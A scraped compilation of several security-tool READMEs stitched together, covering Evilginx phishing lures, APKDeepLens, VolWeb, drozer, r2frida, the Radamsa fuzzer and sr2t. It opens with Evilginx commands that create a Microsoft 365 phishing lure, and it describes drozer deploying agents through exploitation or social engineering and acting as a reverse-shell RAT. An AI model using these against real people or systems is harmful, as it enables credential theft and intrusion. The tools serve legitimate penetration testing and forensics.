lures create O365
lures get-url 0
Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).
Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB
Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery
My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg
How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation
Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/
APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.
APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:
To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:
git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd /APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help
git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd \APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help
To simply scan an APK, use the below command. Mention the apk file with -apk
argument. Once the scan is complete, a detailed report will be displayed in the console.
python3 APKDeepLens.py -apk file.apk
If you've already extracted the source code and want to provide its path for a faster scan you can use the below command. Mention the source code of the android application with -source
parameter.
python3 APKDeepLens.py -apk file.apk -source <source-code-path>
To generate detailed PDF and HTML reports after the scan you can pass -report
argument as mentioned below.
python3 APKDeepLens.py -apk file.apk -report
We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.
For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)
VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.
The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.
By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.
The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.
[!IMPORTANT] Take time to read the documentation in order to avoid common miss-configuration issues.
VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository proposing some scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts Check the wiki of the project to learn more about the possible API calls.
If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.
Contact me at k1nd0ne@mail.com for any questions regarding this tool.
Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1
drozer (formerly Mercury) is the leading security testing framework for Android.
drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).
drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.
drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/
To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.
Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.
Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python setup.py bdist_wheel
sudo pip install dist/drozer-2.x.x-py2-none-any.whl
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make deb
sudo dpkg -i drozer-2.x.x.deb
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make rpm
sudo rpm -I drozer-2.x.x-1.noarch.rpm
NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python.exe setup.py bdist_msi
Run dist/drozer-2.x.x.win-x.msi
Drozer can be installed using Android Debug Bridge (adb).
Download the latest Drozer Agent here.
$ adb install drozer-agent-2.x.x.apk
You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.
We will use the server embedded in the drozer Agent to do this.
If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:
$ adb forward tcp:31415 tcp:31415
Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.
Then, on your PC, connect using the drozer Console:
On Linux:
$ drozer console connect
On Windows:
> drozer.bat console connect
If using a real device, the IP address of the device on the network must be specified:
On Linux:
$ drozer console connect --server 192.168.0.10
On Windows:
> drozer.bat console connect --server 192.168.0.10
You should be presented with a drozer command prompt:
selecting f75640f67144d9a3 (unknown sdk 4.1.1)
dz>
The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.
You are now ready to start exploring the device.
Command | Description |
---|---|
run | Executes a drozer module |
list | Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run. |
shell | Start an interactive Linux shell on the device, in the context of the Agent process. |
cd | Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module. |
clean | Remove temporary files stored by drozer on the Android device. |
contributors | Displays a list of people who have contributed to the drozer framework and modules in use on your system. |
echo | Print text to the console. |
exit | Terminate the drozer session. |
help | Display help about a particular command or module. |
load | Load a file containing drozer commands, and execute them in sequence. |
module | Find and install additional drozer modules from the Internet. |
permissions | Display a list of the permissions granted to the drozer Agent. |
set | Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer. |
unset | Remove a named variable that drozer passes to any Linux shells that it spawns. |
drozer is released under a 3-clause BSD License. See LICENSE for full details.
drozer is Open Source software, made great by contributions from the community.
Bug reports, feature requests, comments and questions can be submitted here.
This is a self-contained plugin for radare2 that allows to instrument remote processes using frida.
The radare project brings a complete toolchain for reverse engineering, providing well maintained functionalities and extend its features with other programming languages and tools.
Frida is a dynamic instrumentation toolkit that makes it easy to inspect and manipulate running processes by injecting your own JavaScript, and optionally also communicate with your scripts.
:.
command):db
apir_fs
api.The recommended way to install r2frida is via r2pm:
$ r2pm -ci r2frida
Binary builds that don't require compilation will be soon supported in r2pm
and r2env
. Meanwhile feel free to download the last builds from the Releases page.
In GNU/Debian you will need to install the following packages:
$ sudo apt install -y make gcc libzip-dev nodejs npm curl pkg-config git
$ git clone https://github.com/nowsecure/r2frida.git
$ cd r2frida
$ make
$ make user-install
radare2
(instead of radare2-x.y.z)preconfigure.bat
)configure.bat
and then make.bat
b\r2frida.dll
into r2 -H R2_USER_PLUGINS
For testing, use r2 frida://0
, as attaching to the pid0 in frida is a special session that runs in local. Now you can run the :?
command to get the list of commands available.
$ r2 'frida://?'
r2 frida://[action]/[link]/[device]/[target]
* action = list | apps | attach | spawn | launch
* link = local | usb | remote host:port
* device = '' | host:port | device-id
* target = pid | appname | process-name | program-in-path | abspath
Local:
* frida://? # show this help
* frida:// # list local processes
* frida://0 # attach to frida-helper (no spawn needed)
* frida:///usr/local/bin/rax2 # abspath to spawn
* frida://rax2 # same as above, considering local/bin is in PATH
* frida://spawn/$(program) # spawn a new process in the current system
* frida://attach/(target) # attach to target PID in current host
USB:
* frida://list/usb// # list processes in the first usb device
* frida://apps/usb// # list apps in the first usb device
* frida://attach/usb//12345 # attach to given pid in the first usb device
* frida://spawn/usb//appname # spawn an app in the first resolved usb device
* frida://launch/usb//appname # spawn+resume an app in the first usb device
Remote:
* frida://attach/remote/10.0.0.3:9999/558 # attach to pid 558 on tcp remote frida-server
Environment: (Use the `%` command to change the environment at runtime)
R2FRIDA_SAFE_IO=0|1 # Workaround a Frida bug on Android/thumb
R2FRIDA_DEBUG=0|1 # Used to debug argument parsing behaviour
R2FRIDA_COMPILER_DISABLE=0|1 # Disable the new frida typescript compiler (`:. foo.ts`)
R2FRIDA_AGENT_SCRIPT=[file] # path to file of the r2frida agent
$ r2 frida://0 # same as frida -p 0, connects to a local session
You can attach, spawn or launch to any program by name or pid, The following line will attach to the first process named rax2
(run rax2 -
in another terminal to test this line)
$ r2 frida://rax2 # attach to the first process named `rax2`
$ r2 frida://1234 # attach to the given pid
Using the absolute path of a binary to spawn will spawn the process:
$ r2 frida:///bin/ls
[0x00000000]> :dc # continue the execution of the target program
Also works with arguments:
$ r2 frida://"/bin/ls -al"
For USB debugging iOS/Android apps use these actions. Note that spawn
can be replaced with launch
or attach
, and the process name can be the bundleid or the PID.
$ r2 frida://spawn/usb/ # enumerate devices
$ r2 frida://spawn/usb// # enumerate apps in the first iOS device
$ r2 frida://spawn/usb//Weather # Run the weather app
These are the most frequent commands, so you must learn them and suffix it with ?
to get subcommands help.
:i # get information of the target (pid, name, home, arch, bits, ..)
.:i* # import the target process details into local r2
:? # show all the available commands
:dm # list maps. Use ':dm|head' and seek to the program base address
:iE # list the exports of the current binary (seek)
:dt fread # trace the 'fread' function
:dt-* # delete all traces
r2frida plugins run in the agent side and are registered with the r2frida.pluginRegister
API.
See the plugins/
directory for some more example plugin scripts.
[0x00000000]> cat example.js
r2frida.pluginRegister('test', function(name) {
if (name === 'test') {
return function(args) {
console.log('Hello Args From r2frida plugin', args);
return 'Things Happen';
}
}
});
[0x00000000]> :. example.js # load the plugin script
The :.
command works like the r2's .
command, but runs inside the agent.
:. a.js # run script which registers a plugin
:. # list plugins
:.-test # unload a plugin by name
:.. a.js # eternalize script (keeps running after detach)
If you are willing to install and use r2frida natively on Android via Termux, there are some caveats with the library dependencies because of some symbol resolutions. The way to make this work is by extending the LD_LIBRARY_PATH
environment to point to the system directory before the termux libdir.
$ LD_LIBRARY_PATH=/system/lib64:$LD_LIBRARY_PATH r2 frida://...
Ensure you are using a modern version of r2 (preferibly last release or git).
Run r2 -L | grep frida
to verify if the plugin is loaded, if nothing is printed use the R2_DEBUG=1
environment variable to get some debugging messages to find out the reason.
If you have problems compiling r2frida you can use r2env
or fetch the release builds from the GitHub releases page, bear in mind that only MAJOR.MINOR version must match, this is r2-5.7.6 can load any plugin compiled on any version between 5.7.0 and 5.7.8.
+---------+
| radare2 | The radare2 tool, on top of the rest
+---------+
:
+----------+
| io_frida | r2frida io plugin
+----------+
:
+---------+
| frida | Frida host APIs and logic to interact with target
+---------+
:
+-------+
| app | Target process instrumented by Frida with Javascript
+-------+
This plugin has been developed by pancake aka Sergi Alvarez (the author of radare2) for NowSecure.
I would like to thank Ole Andrรฉ for writing and maintaining Frida as well as being so kind to proactively fix bugs and discuss technical details on anything needed to make this union to work. Kudos
Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and, easy to get up and running.
$ # please please please fuzz your programs. here is one way to get data for it:
$ sudo apt-get install gcc make git wget
$ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
$ echo "HAL 9000" | radamsa
Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes are in some of the most widely used programming languages usually enough for attackers to gain undesired powers.
Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and how to see what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit- or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they fuzz typically instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to counterprove by finding a counterexample a theorem about the program stating that for all inputs something doesn't happen.
There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.
Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.
Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.
Supported operating systems: * GNU/Linux * OpenBSD * FreeBSD * Mac OS X * Windows (using Cygwin)
Software requirements for building from sources: * gcc / clang * make * git * wget
$ git clone https://gitlab.com/akihe/radamsa.git
$ cd radamsa
$ make
$ sudo make install # optional, you can also just grab bin/radamsa
$ radamsa --help
Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.
This section assumes some familiarity with UNIX scripting.
Radamsa can be thought as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It has also support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.
Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.
In the simplest case, from scripting point of view, radamsa can be used to fuzz data going through a pipe.
$ echo "aaa" | radamsa
aaaa
Here radamsa decided to add one 'a' to the input. Let's try that again.
$ echo "aaa" | radamsa
หaaa
Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.
$ echo "Fuzztron 2000" | radamsa --seed 4
Fuzztron 4294967296
This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.
You can generate more than one output by using the -n parameter as follows:
$ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
1 + (2 + (2 + (3 + 4?)
1 + (2 + (3 +?4))
18446744073709551615 + 4)))
1 + (2 + (3 + 170141183460469231731687303715884105727))
There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.
What we have so far can be used to for example test programs that read input from standard input, as in
$ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
[...]
(standard_in) 1418: illegal character: ^_
(standard_in) 1422: syntax error
(standard_in) 1424: syntax error
(standard_in) 1424: memory exhausted
[hang]
Or the compiler used to compile Radamsa:
$ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
[...]
> What is 'รณ ยต'?
4901126677
> $
Or to test decompression:
$ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null
Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:
$ gzip -c /bin/bash > sample.gz
$ while true; do radamsa sample.gz | gzip -d > /dev/null; done
Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat Radamsa will by default write the output to stdout, but unlike cat when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:
$ gzip -c /bin/bash > sample.gz
$ while true
do
radamsa sample.gz > fuzzed.gz
gzip -dc fuzzed.gz > /dev/null
test $? -gt 127 && break
done
This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.
One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the output on command line to the target program. We'll make a simple such script for bc, which accepts files from command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.
$ echo "1 + 2" > sample-1
$ echo "(124 % 7) ^ 1*2" > sample-2
$ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
$ bc sample-* < /dev/null
3
10
5
$ while true
do
radamsa -o fuzz-%n -n 100 sample-*
bc fuzz-* < /dev/null
test $? -gt 127 && break
done
This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.
In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.
The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:
-o argument | meaning | example |
---|---|---|
:port | act as a TCP server in given port | # radamsa -o :80 -n inf samples/*.http-resp |
ip:port | connect as TCP client to port of ip | $ radamsa -o 127.0.0.1:80 -n inf samples/*.http-req |
- | write to stdout | $ radamsa -o - samples/*.vt100 |
path | write to files, %n is testcase # and %s the first suffix | $ radamsa -o test-%n.%s -n 100 samples/*.foo |
Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.
A non-exhaustive list of free complementary tools:
A non-exhaustive list of related free tools: * American fuzzy lop (http://lcamtuf.coredump.cx/afl/) * Zzuf (http://caca.zoy.org/wiki/zzuf) * Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/) * Peach (http://peachfuzzer.com/) * Sulley (http://code.google.com/p/sulley/)
Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe due to being reachable from via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.
A robustness testing tool is obviously only good only if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.
The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVE:s should be read as 'product X is now more robust (against Y)'.
CVE | program | credit |
---|---|---|
CVE-2007-3641 | libarchive | OUSPG |
CVE-2007-3644 | libarchive | OUSPG |
CVE-2007-3645 | libarchive | OUSPG |
CVE-2008-1372 | bzip2 | OUSPG |
CVE-2008-1387 | ClamAV | OUSPG |
CVE-2008-1412 | F-Secure | OUSPG |
CVE-2008-1837 | ClamAV | OUSPG |
CVE-2008-6536 | 7-zip | OUSPG |
CVE-2008-6903 | Sophos Anti-Virus | OUSPG |
CVE-2010-0001 | Gzip | integer underflow in unlzw |
CVE-2010-0192 | Acroread | OUSPG |
CVE-2010-1205 | libpng | OUSPG |
CVE-2010-1410 | Webkit | OUSPG |
CVE-2010-1415 | Webkit | OUSPG |
CVE-2010-1793 | Webkit | OUSPG |
CVE-2010-2065 | libtiff | found by CERT-FI |
CVE-2010-2443 | libtiff | found by CERT-FI |
CVE-2010-2597 | libtiff | found by CERT-FI |
CVE-2010-2482 | libtiff | found by CERT-FI |
CVE-2011-0522 | VLC | found by Harry Sintonen |
CVE-2011-0181 | Apple ImageIO | found by Harry Sintonen |
CVE-2011-0198 | Apple Type Services | found by Harry Sintonen |
CVE-2011-0205 | Apple ImageIO | found by Harry Sintonen |
CVE-2011-0201 | Apple CoreFoundation | found by Harry Sintonen |
CVE-2011-1276 | Excel | found by Nicolas Grรฉgoire of Agarri |
CVE-2011-1186 | Chrome | OUSPG |
CVE-2011-1434 | Chrome | OUSPG |
CVE-2011-2348 | Chrome | OUSPG |
CVE-2011-2804 | Chrome/pdf | OUSPG |
CVE-2011-2830 | Chrome/pdf | OUSPG |
CVE-2011-2839 | Chrome/pdf | OUSPG |
CVE-2011-2861 | Chrome/pdf | OUSPG |
CVE-2011-3146 | librsvg | found by Sauli Pahlman |
CVE-2011-3654 | Mozilla Firefox | OUSPG |
CVE-2011-3892 | Theora | OUSPG |
CVE-2011-3893 | Chrome | OUSPG |
CVE-2011-3895 | FFmpeg | OUSPG |
CVE-2011-3957 | Chrome | OUSPG |
CVE-2011-3959 | Chrome | OUSPG |
CVE-2011-3960 | Chrome | OUSPG |
CVE-2011-3962 | Chrome | OUSPG |
CVE-2011-3966 | Chrome | OUSPG |
CVE-2011-3970 | libxslt | OUSPG |
CVE-2012-0449 | Firefox | found by Nicolas Grรฉgoire of Agarri |
CVE-2012-0469 | Mozilla Firefox | OUSPG |
CVE-2012-0470 | Mozilla Firefox | OUSPG |
CVE-2012-0457 | Mozilla Firefox | OUSPG |
CVE-2012-2825 | libxslt | found by Nicolas Grรฉgoire of Agarri |
CVE-2012-2849 | Chrome/GIF | OUSPG |
CVE-2012-3972 | Mozilla Firefox | found by Nicolas Grรฉgoire of Agarri |
CVE-2012-1525 | Acrobat Reader | found by Nicolas Grรฉgoire of Agarri |
CVE-2012-2871 | libxslt | found by Nicolas Grรฉgoire of Agarri |
CVE-2012-2870 | libxslt | found by Nicolas Grรฉgoire of Agarri |
CVE-2012-2870 | libxslt | found by Nicolas Grรฉgoire of Agarri |
CVE-2012-4922 | tor | found by the Tor project |
CVE-2012-5108 | Chrome | OUSPG via NodeFuzz |
CVE-2012-2887 | Chrome | OUSPG via NodeFuzz |
CVE-2012-5120 | Chrome | OUSPG via NodeFuzz |
CVE-2012-5121 | Chrome | OUSPG via NodeFuzz |
CVE-2012-5145 | Chrome | OUSPG via NodeFuzz |
CVE-2012-4186 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2012-4187 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2012-4188 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2012-4202 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2013-0744 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2013-1691 | Mozilla Firefox | OUSPG |
CVE-2013-1708 | Mozilla Firefox | OUSPG |
CVE-2013-4082 | Wireshark | found by cons0ul |
CVE-2013-1732 | Mozilla Firefox | OUSPG |
CVE-2014-0526 | Adobe Reader X/XI | Pedro Ribeiro (pedrib@gmail.com) |
CVE-2014-3669 | PHP | |
CVE-2014-3668 | PHP | |
CVE-2014-8449 | Adobe Reader X/XI | Pedro Ribeiro (pedrib@gmail.com) |
CVE-2014-3707 | cURL | Symeon Paraschoudis |
CVE-2014-7933 | Chrome | OUSPG |
CVE-2015-0797 | Mozilla Firefox | OUSPG |
CVE-2015-0813 | Mozilla Firefox | OUSPG |
CVE-2015-1220 | Chrome | OUSPG |
CVE-2015-1224 | Chrome | OUSPG |
CVE-2015-2819 | Sybase SQL | vah_13 (ERPScan) |
CVE-2015-2820 | SAP Afaria | vah_13 (ERPScan) |
CVE-2015-7091 | Apple QuickTime | Pedro Ribeiro (pedrib@gmail.com) |
CVE-2015-8330 | SAP PCo agent | Mathieu GELI (ERPScan) |
CVE-2016-1928 | SAP HANA hdbxsengine | Mathieu Geli (ERPScan) |
CVE-2016-3979 | SAP NetWeaver | @ret5et (ERPScan) |
CVE-2016-3980 | SAP NetWeaver | @ret5et (ERPScan) |
CVE-2016-4015 | SAP NetWeaver | @vah_13 (ERPScan) |
CVE-2016-4015 | SAP NetWeaver | @vah_13 (ERPScan) |
CVE-2016-9562 | SAP NetWeaver | @vah_13 (ERPScan) |
CVE-2017-5371 | SAP ASE OData | @vah_13 (ERPScan) |
CVE-2017-9843 | SAP NETWEAVER | @vah_13 (ERPScan) |
CVE-2017-9845 | SAP NETWEAVER | @vah_13 (ERPScan) |
CVE-2018-0101 | Cisco ASA WebVPN/AnyConnect | @saidelike (NCC Group) |
We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.
The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.
Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.
You can also drop by at #radamsa on Freenode if you have questions or feedback.
Issues your programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day) chances are that others will too.
Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.
Q: If I find a bug with radamsa, do I have to mention the tool?
A: No.
Q: Will you make a graphical version of radamsa?
A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.
Q: I can't install! I don't have root access on the machine!
A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.
Q: Radamsa takes several GB of memory to compile!1
A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions in this page.
Q: Radamsa does not compile using the instructions in this page!
A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email (aohelin@gmail.com) or IRC (#radamsa on freenode).
Q: I used fuzzer X and found much more bugs from program Y than Radamsa did.
A: Cool. Let me know about it (aohelin@gmail.com) and I'll try to hack something X-ish to radamsa if it's general purpose enough. It'd also be useful to get some samples which you used to check how well radamsa does, because it might be overfitting some heuristic.
Q: Can I get support for using radamsa?
A: You can send email to aohelin@gmail.com or check if some of us happen to be hanging around at #radamsa on freenode.
Q: Can I use radamsa on Windows?
A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.
Q: How can I install radamsa?
A: Grab a binary from downloads and run it, or $ make && sudo make install.
Q: How can I uninstall radamsa?
A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.
Q: Why are many outputs generated by Radamsa equal?
A: Radamsa doesn't keep track which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.
Q: There are lots of command line options. Which should I use for best results?
A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future proof to let radamsa decide the details.
Q: How can I make radamsa faster?
A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.
Q: What's with the funny name?
A: It's from a scene in a Finnish children's story. You've probably never heard about it.
Q: Is this the last question?
A: Yes.
Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things to happen. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to fuzzed data before they are being tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.
Not safe when used as prescribed.
This product may contain faint traces of parenthesis.
This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:
This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.
Using Pip:
pip install --user sr2t
You can use sr2t
in two ways:
sr2t --help
.python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]
